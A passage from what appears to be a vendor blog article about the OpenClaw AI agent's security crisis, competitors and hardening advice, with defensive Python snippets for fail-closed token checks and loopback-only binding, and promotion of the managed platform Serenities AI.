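    If OPENCLAW_GATEWAY_TOKEN is unset, refuse the connection rather than
    silently allowing unauthenticated access (the opt-in default that left
    30,000+ instances exposed).
    """
    expected = os.environ.get("OPENCLAW_GATEWAY_TOKEN")
    if not expected or not presented:
        return False
    # hmac.compare_digest avoids leaking token length/prefix via timing.
    return hmac.compare_digest(presented, expected)
```

The design choice that matters is the fail-closed branch: an unset token rejects everything, which turns "forgot to configure auth" from a silent exposure into an immediate, visible failure.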
Competition
OpenClaw doesn't exist in a vacuum. The AI agent space is intensely competitive in 2026:
Claude Code (Anthropic): A powerful CLI-based agent with deep coding capabilities, but limited to terminal interactions — no multi-channel messaging, no proactive heartbeat.
GitHub Copilot Agents: Deeply integrated into the GitHub ecosystem with agents that can open PRs and respond to issues, but scoped to development workflows.
Custom agent frameworks (LangChain, CrewAI, AutoGen): Flexible libraries for building agents, but they're frameworks — you build the agent, not install one. They lack OpenClaw's "install and run" simplicity.
OpenClaw's unique value proposition remains its combination of multi-channel messaging, persistent memory, proactive heartbeat, and an open skills ecosystem — all in a single installable package. No competitor offers all four.
The Bigger Picture: Managed vs. Self-Hosted Agents
The OpenClaw security crisis highlighted a fundamental tension in the AI agent space: self-hosted agents offer maximum control and privacy, but require users to handle security, updates, and infrastructure. Managed platforms trade some control for reduced operational burden.
This is where platforms like Serenities AI enter the picture. Serenities AI takes the core concepts that made OpenClaw popular — multi-channel agents, persistent memory, MCP protocol support — and delivers them as a managed service. Instead of configuring HEARTBEAT.md files and worrying about WebSocket security, you get the same capabilities through a platform that handles infrastructure, security patching, and credential management for you.
For teams that want agent capabilities without the operational overhead and security risk of self-hosting, managed platforms are worth evaluating. They don't replace OpenClaw for developers who want full control, but for the "my mum" users Steinberger wants to reach at OpenAI, managed platforms are the realistic path.
The market likely isn't winner-take-all. Self-hosted (OpenClaw) and managed (Serenities AI and others) will coexist, serving different segments with different risk tolerances and technical capabilities.
Frequently Asked Questions
Is OpenClaw still safe to use after the security vulnerabilities?
The core vulnerability (CVE-2026-25253) was patched in v2026.1.29, released January 30, 2026. If you're running this version or later, the specific one-click RCE chain is fixed. However, you should also enable Gateway authentication (OPENCLAW_GATEWAY_TOKEN), carefully vet any skills you install from ClawHub, and avoid exposing the Gateway port to the internet. The architectural risk of plaintext credential storage remains, so treat your workspace directory as sensitive.
Did OpenAI acquire OpenClaw?
No. OpenAI hired Peter Steinberger, OpenClaw's creator, but did not acquire the project's code or IP. OpenClaw is transitioning to an independent, open-source foundation. OpenAI will sponsor the project, but the codebase remains MIT-licensed and community-governed. Steinberger joined OpenAI to "drive the next generation of personal agents," suggesting OpenClaw's concepts influenced his work there, but the project itself stays independent.
What models does OpenClaw support?
OpenClaw is model-agnostic. It supports Claude (Anthropic), GPT (OpenAI), Gemini (Google), Mistral, and local models via Ollama and other providers. You configure the model in your settings, and the agent loop works identically regardless of the backend. The default has historically pointed toward Claude, though this may evolve under foundation governance with OpenAI sponsorship.
How does OpenClaw compare to Claude Code or GitHub Copilot?
Claude Code is a terminal-based coding agent — powerful for development tasks but limited to CLI interaction with no multi-channel messaging or proactive scheduling. GitHub Copilot Agents are scoped to the GitHub ecosystem (PRs, issues, code review). OpenClaw is broader: it connects to WhatsApp, Telegram, Discord, Slack, and more, with persistent memory and proactive heartbeat capabilities. They serve different use cases — coding-focused vs. general-purpose personal agent.
Can I self-host OpenClaw securely for enterprise use?
You can, but it requires hardening beyond the default configuration. At minimum: enable Gateway authentication, run behind a reverse proxy with TLS, audit all installed skills, restrict network access to the Gateway port, and monitor the workspace directory for unauthorized changes. The enterprise Shadow AI concern is real — security teams should have a policy for AI agent deployments rather than discovering them after a breach. Consider managed alternatives if your team can't commit to ongoing security maintenance.
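One of the hardening steps above, restricting network access to the Gateway port, comes down to binding the listener to the loopback interface only, so the port is unreachable from other machines and all remote access has to pass through the authenticated TLS reverse proxy. A minimal sketch, with the helper name hypothetical and 18789 being the port cited earlier:

```python
import socket

def bind_loopback_only(port: int = 18789) -> socket.socket:
    """Bind the Gateway listener to 127.0.0.1 instead of 0.0.0.0.

    A socket bound to the loopback interface cannot be reached from the
    network; expose it externally only via an authenticated reverse proxy.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    sock.bind(("127.0.0.1", port))
    sock.listen()
    return sock
```

The 21,000-instance spike Censys measured was largely the opposite configuration: listeners bound to 0.0.0.0 on hosts with public IPs.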
What happens to OpenClaw if the foundation fails?
The project is MIT-licensed, which means anyone can fork it regardless of what happens to the foundation. The codebase, all 234,621 stars worth of community interest, and the skills ecosystem aren't locked behind a proprietary license. If the foundation struggles, the community can self-organize around a fork — similar to how io.js forked from Node.js before eventually merging back. The MIT license is OpenClaw's ultimate insurance policy.
Conclusion: The Most Important Open-Source AI Project of 2026
OpenClaw's story in 2026 reads like a compressed Silicon Valley epic: explosive growth, groundbreaking architecture, a devastating security crisis, and a dramatic founder departure to the industry's most prominent company. In three months, it went from a personal project to a foundation-governed open-source standard with 234,621 GitHub stars, 10,700+ skills, and the explicit backing of OpenAI.
The architecture — a single Gateway process connecting every messaging surface, persistent Markdown-based memory, and the proactive Heartbeat system — represents a genuine paradigm shift in how we think about AI agents. Not as chatbots you talk to, but as always-on assistants that work for you.
The security crisis was a painful but necessary wake-up call. A project this powerful, deployed at this scale, needs enterprise-grade security — and the community is now building it. The foundation model gives OpenClaw the governance structure to mature responsibly.
Whether you choose to self-host OpenClaw, use a managed platform like Serenities AI that delivers similar capabilities with less operational overhead, or wait for whatever Steinberger builds at OpenAI — the personal AI agent era is here. OpenClaw proved the demand. Now the industry is racing to meet it securely, reliably, and at scale.
Want to stay ahead of the AI agent revolution? Visit Serenities AI for in-depth analysis, comparisons, and tools that help you navigate the rapidly evolving AI landscape.